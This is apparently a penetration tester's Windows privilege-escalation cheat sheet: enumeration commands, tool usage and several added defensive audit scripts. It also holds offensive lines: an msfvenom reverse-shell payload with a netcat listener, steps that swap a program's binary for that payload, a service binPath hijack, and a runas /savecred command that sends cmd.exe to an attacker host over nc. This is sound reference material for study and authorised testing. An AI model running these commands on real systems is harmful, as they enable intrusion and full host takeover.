- Testing for Privilege Escalation (WSTG-ATHZ-03)
- Windows Exploit Suggester
- Windows Privilege Escalation Fundamentals *** READ IT ***
- Privilege Escalation in Windows (infosecwriteups)
Privilege Escalation Paths – look for:
- Misconfigured services
- File permissions on binaries or services
- OS/Kernel vulnerabilities
- Vulnerable software running with high privileges
- Sensitive information stored in local files – like hard coded credentials
- Registry settings that always elevate privileges before executing a binary
- Other, be creative… 😉
Old Windows version, check HackTheBox – Servmon (for winPEAS, to validate)
Service
- DLL Hijacking: see HackTricks
- Windows Unquoted Service Path
- Named Pipes
- Registry
- Executable File
- binPath
Kernel
Search for exploits? List applied KBs (hotfixes):
OS Version
Seems more reliable than systeminfo and winPEAS output… (caveat: on Windows 10 version 20H2 and later, ReleaseId stays at 2009; the DisplayVersion value under the same key carries the real feature version, e.g. 21H2.)
```cmd
REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ReleaseId
```
```powershell
Get-WmiObject -Query 'select * from win32_quickfixengineering'
```
Password Mining
Registry
HKCU\Software\SimonTatham\PuTTY\Sessions
AutoLogin
VNC
Logs
.rdp Files
Memory
Mimikatz
Process Dump (minidump)
Configuration Files
unattend.xml
SiteList.xml
web.config
vnc.ini
Cached SAM
Registry
- Autorun
- AlwaysInstallElevated
Scheduled Tasks
- Binary Overwrite
- Missing Binary
Hot Potato
To complete…
Startup Applications
To complete….
User Enumeration
See also Users & Groups & Active Directory (AD).
```cmd
whoami
net user
net user <username>
```
Groups for current user
```cmd
whoami /groups
```
Privileges for current user
A privilege listed as Disabled is still held by the token; Disabled only means the current process has not enabled it yet, so treat it as present.
```cmd
whoami /priv
```
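An added example (not from the original notes) that makes the point above concrete: it parses whoami /priv and lists every privilege the token holds, keeping the Disabled ones, and marks the ones on a watch list. The watch list is an assumption of this example, taken from the administrator-equivalent privileges that the Priv2Admin list referenced further down this page covers; the CSV column names are ours so the parsing does not depend on the OS language.

```powershell
# Added example (not part of the original notes): list every privilege the current
# token holds, with its state. A Disabled privilege is still held and can be
# enabled by any process running under this token, so it is reported as well.
# The watch list is an assumption of this example (administrator-equivalent
# privileges, as covered by the Priv2Admin list); adjust it to your own policy.
$WatchList = @(
    'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege', 'SeDebugPrivilege',
    'SeBackupPrivilege', 'SeRestorePrivilege', 'SeTakeOwnershipPrivilege',
    'SeLoadDriverPrivilege', 'SeTcbPrivilege', 'SeCreateTokenPrivilege'
)

function Get-TokenPrivilege {
    # `/fo csv /nh` prints one CSV row per privilege without a header line, so the
    # column names below are ours and work on an English or a French OS alike.
    # The State text itself is localized ("Enabled" / "Activé"), so it is kept verbatim.
    $rows = whoami /priv /fo csv /nh | ConvertFrom-Csv -Header 'Name', 'Description', 'State'
    foreach ($row in $rows) {
        [pscustomobject]@{
            Name  = $row.Name
            State = $row.State
            Watch = ($WatchList -contains $row.Name)
        }
    }
}

# Watch-listed privileges first; everything else follows, Disabled entries included.
Get-TokenPrivilege | Sort-Object -Property Watch -Descending | Format-Table -AutoSize
```

From a defender's side the useful reading is the Watch column regardless of State: an account whose token carries one of those privileges should be treated as an administrator when you review group membership and service accounts.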
Host
Hostname
The hostname can give an indication of the server’s purpose and OS. The host naming convention can be used to discover more targets.
```cmd
hostname
```
OS / Architecture
Use this instead!! Double-check…
```cmd
REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ReleaseId
```
English OS
```cmd
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
```
French OS
```cmd
systeminfo | findstr /B /C:"Nom du syst" /C:"Version du syst" /C:"Type du syst"
```
Processes & Services
Look for processes running under highly privileged accounts that have insecure permissions or known vulnerabilities.
Tasklist Official Documentation. Output is limited when not an admin.
Vulnerabilities
See Windows Unquoted Service Path.
Processes mapped to specific Windows services
```cmd
tasklist /SVC
```
```powershell
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
```
List services & drivers
- Official Documentation (Microsoft)
Obtains and displays information about the specified service, driver, type of service, or type of driver. Note that sc expects a space after each option's equals sign (type= service).
```cmd
sc query
sc query <service name>
sc query type= service
sc qc <service name>
```
NOT TESTED
```cmd
sc config <service name> binPath=c:\...\rev.exe
```
Check file permissions for all running processes
```powershell
# For every running service, run icacls on its executable.
# A quoted PathName is cut at the quotes; an unquoted one is cut at the first space,
# so an unquoted path that contains spaces is only checked up to that first space.
$list = Get-WmiObject win32_service |
    Select-Object Name, State, PathName |
    Where-Object { $_.State -like 'Running' }
foreach ($item in $list) {
    if ($item.PathName) {
        if ($item.PathName -match '"') {
            icacls $item.PathName.split('"')[1]
        } else {
            icacls $item.PathName.split(' ')[0]
        }
    }
}
```
Check permissions on a specific file
If interesting (custom) services, check if we can overwrite the executable. See Official Documentation for icacls.
- F – Full access
- M- Modify access
- RX – Read and execute access
- R – Read-only access
- W – Write-only access
```cmd
icacls "C:\Program Files\<some file>.exe"
```
Installed applications / Software
```bash
msfvenom -p windows/shell_reverse_tcp LHOST=$KALI_IP LPORT=443 -f exe > myprecious.exe
sudo nc -nlvp 443
# Transfer file to Windows
```
```cmd
cd "C:\Program Files"
cd <software folder>
move "Software.exe" "Software_bak.exe"
move myprecious.exe Software.exe
shutdown /r /t 5
```
Network
Can be used to pivot 😉
```cmd
ipconfig /all
```
Route Official Documentation
```cmd
route print
```
Listening ports and established sessions
```cmd
netstat -ano
```
List shares
```cmd
net share
```
Firewall
See netsh official documentation, and documentation on netsh firewall.
```cmd
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all
netsh advfirewall firewall show rule status=enabled name=all
netsh advfirewall firewall show rule dir=out status=enabled name=all | findstr /i LocalPort | sort /unique
netsh advfirewall firewall show rule name=all dir=in type=dynamic
```
Open ports
The netsh firewall context is deprecated (netsh advfirewall is its replacement) but still answers on many hosts:
```cmd
netsh firewall show state
```
Scheduled Jobs
Look for scripts in scheduled jobs that can be modified and that run as highly privileged users.
See schtasks official documentation.
```cmd
schtasks /query /fo LIST
schtasks /query /fo LIST /v
```
Display only task names
```cmd
schtasks /query /fo LIST | findstr /B /C:"TaskName"
```
Task To Run
Can this be used for Windows Unquoted Service Path? TO VALIDATE 😉
```cmd
schtasks /query /fo LIST /v | findstr /C:"Task To Run"
```
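The two checks described on this page, service executables with weak permissions (the "Check file permissions for all running processes" script above) and scheduled-task actions that point at a modifiable file, share the same two questions: is the path unquoted with spaces in it, and can a low-privileged identity write to the resolved executable? The added example below (not code from the original notes) answers both for services and for scheduled tasks in one read-only audit. It is mine, not the page author's: the well-known SID list, the rights mask and the function names are assumptions; the unquoted-path resolution mirrors how the service control manager tries each space-delimited prefix, and the ACL check compares SIDs rather than names so it behaves the same on an English or a French OS.

```powershell
# Added example (not part of the original notes): audit service binaries and
# scheduled-task actions for unquoted paths with spaces and for executables that
# low-privileged identities can modify. Read-only; run as an administrator to see
# every service and task. The SID list and the rights mask are assumptions.

# Well-known SIDs that should never hold write access to a privileged binary:
# Everyone, Authenticated Users, INTERACTIVE, BUILTIN\Users (locale-independent).
$LowPrivSids = @('S-1-1-0', 'S-1-5-11', 'S-1-5-4', 'S-1-5-32-545')

# Rights that allow replacing or altering the file. Generic rights
# (GENERIC_WRITE 0x40000000, GENERIC_ALL 0x10000000) show up as raw numbers in ACEs.
$WriteMask = [int][System.Security.AccessControl.FileSystemRights]::Write -bor
             [int][System.Security.AccessControl.FileSystemRights]::Modify -bor
             [int][System.Security.AccessControl.FileSystemRights]::FullControl -bor
             [int][System.Security.AccessControl.FileSystemRights]::TakeOwnership -bor
             [int][System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
             0x40000000 -bor 0x10000000

function Resolve-CommandPath {
    # Turn a service/task command line into the executable the service control manager
    # would actually start. Unquoted paths are resolved the way SCM does it: try each
    # space-delimited prefix in turn and take the first one that is an existing file.
    param([string]$CommandLine)
    $cmd = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($cmd.StartsWith('"')) {
        $end = $cmd.IndexOf('"', 1)
        if ($end -gt 0) { return [pscustomobject]@{ Path = $cmd.Substring(1, $end - 1); Quoted = $true } }
    }
    $parts = $cmd -split ' '
    for ($i = 1; $i -le $parts.Count; $i++) {
        $candidate = $parts[0..($i - 1)] -join ' '
        if (Test-Path -LiteralPath $candidate -PathType Leaf) {
            return [pscustomobject]@{ Path = $candidate; Quoted = $false }
        }
    }
    return $null   # relative name (found via PATH) or missing file: not resolved here
}

function Test-WritableByLowPriv {
    # True if any Allow ACE grants a write-capable right to one of $LowPrivSids.
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }   # orphaned or unresolvable identity
        if ($LowPrivSids -notcontains $sid) { continue }
        if (([int]$ace.FileSystemRights -band $WriteMask) -ne 0) { return $true }
    }
    return $false
}

function New-Finding {
    param([string]$Kind, [string]$Name, [string]$RunsAs, [string]$CommandLine)
    $resolved = Resolve-CommandPath $CommandLine
    $path = if ($resolved) { $resolved.Path } else { $CommandLine }
    [pscustomobject]@{
        Kind     = $Kind
        Name     = $Name
        RunsAs   = $RunsAs
        Path     = $path
        Unquoted = [bool]($resolved -and -not $resolved.Quoted -and $resolved.Path.Contains(' '))
        Writable = [bool]($resolved -and (Test-WritableByLowPriv $resolved.Path))
    }
}

function Get-PrivilegedBinaryAudit {
    # Services (same source as the Win32_Service one-liners in these notes) ...
    Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName } | ForEach-Object {
        New-Finding -Kind 'Service' -Name $_.Name -RunsAs $_.StartName -CommandLine $_.PathName
    }
    # ... and scheduled tasks (Get-ScheduledTask needs Windows 8 / Server 2012 or later).
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler / e-mail actions have no executable
            $cmd = if ($action.Arguments) { "$($action.Execute) $($action.Arguments)" } else { $action.Execute }
            New-Finding -Kind 'Task' -Name ($task.TaskPath + $task.TaskName) -RunsAs $task.Principal.UserId -CommandLine $cmd
        }
    }
}

# Only the entries with a finding; an empty table means nothing was flagged.
Get-PrivilegedBinaryAudit |
    Where-Object { $_.Unquoted -or $_.Writable } |
    Format-Table Kind, Name, RunsAs, Unquoted, Writable, Path -AutoSize
```

Read the RunsAs column together with the flags: an Unquoted or Writable entry that runs as LocalSystem or another privileged account is the one to fix first, by quoting the ImagePath and removing write access for the flagged identities on the file and its directory.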
Software Versions
See Windows Management Instrumentation (WMI). Only lists programs installed using Windows Installer (MSI).
```cmd
wmic product get name, version, vendor
wmic qfe get Caption, Description, HotFixID, InstalledOn
```
Permissions on files
Use AccessChk from SysInternals.
```cmd
accesschk.exe -uws "Everyone" "C:\Program Files" -accepteula
accesschk.exe -uws "Everyone" "C:\Program Files"
```
```powershell
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
```
Unmounted Disks
See mountvol.
```cmd
mountvol
```
Device Drivers & Kernel Modules
Loaded drivers
```powershell
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
```
Drivers & versions
```powershell
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Sort-Object -Property DeviceName -Unique
```
Binaries That AutoElevate
Check the status of the AlwaysInstallElevated registry value. A value of 1 allows any user to run Windows Installer packages with elevated privileges; the policy only takes effect when it is set to 1 under both HKCU and HKLM. If enabled, craft an MSI file and run it to elevate privileges.
```cmd
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
```
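An added example (not part of the original notes) that turns the two reg query commands into a check with a verdict and an optional clean-up: it reads AlwaysInstallElevated under both hives, reports whether the policy is actually effective (both must be 1), and with -Fix sets both values to 0. The key paths are the ones quoted in the notes; the function names and the -Fix switch are this example's own.

```powershell
# Added example (not part of the original notes): report the AlwaysInstallElevated
# state under both hives and, with -Fix, set both values to 0. The policy is only
# effective when it is 1 in BOTH HKCU and HKLM; a lone 1 in one hive is not
# effective but is still worth cleaning up.
param([switch]$Fix)

$Keys = @(
    'HKCU:\Software\Policies\Microsoft\Windows\Installer',
    'HKLM:\Software\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevatedState {
    $state = @{}
    foreach ($key in $Keys) {
        # Missing key or missing value both come back as $null (reported as absent).
        $item = Get-ItemProperty -LiteralPath $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        $state[$key] = if ($item) { [int]$item.AlwaysInstallElevated } else { $null }
    }
    [pscustomobject]@{
        HKCU      = $state[$Keys[0]]
        HKLM      = $state[$Keys[1]]
        Effective = (($state[$Keys[0]] -eq 1) -and ($state[$Keys[1]] -eq 1))
    }
}

function Disable-AlwaysInstallElevated {
    # 0 is the documented "disabled" state. If the value is delivered by Group Policy it
    # will be re-applied at the next refresh, so also fix the GPO (Administrative Templates
    # > Windows Components > Windows Installer > "Always install with elevated privileges",
    # in both Computer Configuration and User Configuration).
    foreach ($key in $Keys) {
        if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key -Force | Out-Null }
        Set-ItemProperty -LiteralPath $key -Name AlwaysInstallElevated -Value 0 -Type DWord
    }
}

$state = Get-AlwaysInstallElevatedState
$state
if ($Fix -and ($state.HKCU -eq 1 -or $state.HKLM -eq 1)) {
    Disable-AlwaysInstallElevated
    Get-AlwaysInstallElevatedState   # show the state after the change
}
```

Run it without -Fix during enumeration to get the Effective verdict; the -Fix path needs administrator rights for the HKLM value and is the hardening step, together with the GPO change named in the comment.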
Automation
Use winPEAS and PowerUp.
WinPEAS
WinPeas is the best option.
```bash
git clone https://github.com/carlospolop/PEASS-ng.git
cp ~/PEASS-ng/winPEAS/winPEASbat/winPEAS.bat ~/impacket-share
```
Upload the file on the victim host. See File Transfer. Execute winPEAS on the victim:
```cmd
winPEAS.bat
```
When commands like systeminfo and tasklist give Access denied errors, use the compiled winPEAS.exe instead:
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/ab1b188fb3e88f5071f9faa98e432921f033d357/winPEAS/winPEASexe/winPEAS/bin/Release/Dotfuscated/winPEAS.exe
Jaws
```bash
wget https://raw.githubusercontent.com/411Hall/JAWS/master/jaws-enum.ps1
```
```powershell
.\jaws-enum.ps1 -OutputFileName Jaws-Enum.txt
```
windows-privesc-check
See windows-privesc-check on GitHub.
Help
```cmd
windows-privesc-check2.exe -h
```
List groups – Dump info to analyze manually
```cmd
windows-privesc-check2.exe --dump -G
```
List drives – Dump info to analyze manually
```cmd
windows-privesc-check2.exe --dump -D
```
List shares – Dump info to analyze manually
```cmd
windows-privesc-check2.exe --dump -H
```
Identify and report security weaknesses
```cmd
windows-privesc-check2.exe --audit -S -o C:\Users\<username>\Desktop\audit-services
windows-privesc-check2.exe --audit --allfiles -o report-allfiles.txt
```
Examine options, as printed by the tool's help:
```text
examine opts:
  At least one of these to indicate what to examine (*=not implemented)

  -a, --all             All Simple Checks (non-slow)
  -A, --allfiles        All Files and Directories (slow)
  -D, --drives          Drives
  -e, --reg_keys        Misc security-related reg keys
  -E, --eventlogs       Event Log*
  -f INTERESTING_FILE_LIST, --interestingfiledir=INTERESTING_FILE_LIST
                        Changes -A behaviour. Look here INSTEAD
  -F INTERESTING_FILE_FILE, --interestingfilefile=INTERESTING_FILE_FILE
                        Changes -A behaviour. Look here INSTEAD. On dir per line
  -G, --groups          Groups
  -H, --shares          Shares
  -I, --installed_software
                        Installed Software
  -j, --tasks           Scheduled Tasks
  -k, --drivers         Kernel Drivers
  -L, --loggedin        Logged In
  -O, --ntobjects       NT Objects
  -n, --nointerestingfiles
                        Changes -A/-f/-F behaviour. Don't report interesting files
  -N, --nounreadableif
                        Changes -A/-f/-F behaviour. Report only interesting files
                        readable by untrsuted users (see -x, -X, -b, -B)
  -P, --progfiles       Program Files Directory Tree
  -r, --registry        Registry Settings + Permissions
  -R, --processes       Processes
  -S, --services        Windows Services
  -t, --paths           PATH
  -T PATCHFILE, --patches=PATCHFILE
                        Patches. Arg is filename of xlsx patch info. Download from
                        http://go.microsoft.com/fwlink/?LinkID=245778 or pass 'auto'
                        to fetch automatically
  -U, --users           Users
  -v, --verbose         More verbose output on console
  -W, --errors          Die on errors instead of continuing (for debugging)
  -z, --noappendices    No report appendices in --audit mode
```
adPEAS
Check https://github.com/61106960/adPEAS
Privilege Escalation Techniques
- User Account Control (UAC) Bypass
- Kernel driver vulnerabilities
- Windows Insecure file permissions
- Windows Unquoted Service Path
- Juicy Potato
- PrintSpoofer
- Windows OS privileges (whoami /priv): see https://github.com/gtworek/Priv2Admin
- OffSec Journey
- PetitPotam NTLM Relay
Stored Credentials
If cmdkey /list returns entries, you may be able to use runas /savecred as a user who stored their credentials on this Windows host.
```cmd
runas /savecred /user:ACCESS\Administrator "c:\windows\system32\cmd.exe /c \\IP\share\nc.exe -nv KALI_IP 80 -e cmd.exe"
```